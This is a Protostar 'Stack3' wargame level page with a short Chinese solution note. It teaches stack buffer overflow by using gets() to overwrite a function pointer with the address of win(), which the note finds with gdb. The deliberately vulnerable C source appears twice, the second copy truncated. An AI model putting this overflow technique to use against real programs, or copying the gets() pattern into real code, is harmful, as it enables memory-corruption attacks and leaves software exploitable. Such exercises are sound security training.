About
Stack3 looks at environment variables, and how they can be set, and overwriting function pointers stored on the stack (as a prelude to overwriting the saved EIP)
Hints:
- both gdb and objdump is your friend you determining where the win() function lies in memory.
This level is at /opt/protostar/bin/stack3
Source code
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
volatile int (*fp)();
char buffer[64];
fp = 0;
gets(buffer);
if(fp) {
printf("calling function pointer, jumping to 0x%08x\n", fp);
fp();
}
}
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
volatile int (*fp)();
char buffer[64];
fp = 0;
gets(buffer);
if(fp) {
printf("calling function pointer, jumping to 0x%08x\n", fp);
fp();
}
}
从hits中得知gdb是个好用的工具。gdb是个很好用的Debug工具,具体用法请Google之。。。
根据之前的题目应该很快领悟到只需要将buffer超出64字节即可进行关键if语句中。但随后发现仍需要进入win()函数才行,而我们并不知道win的地址是多少~~此时便需要用到gdb这个工具了
获得win函数地址是0x08048424,这下好办了,只需要0x08048424覆盖到fp即可。。。
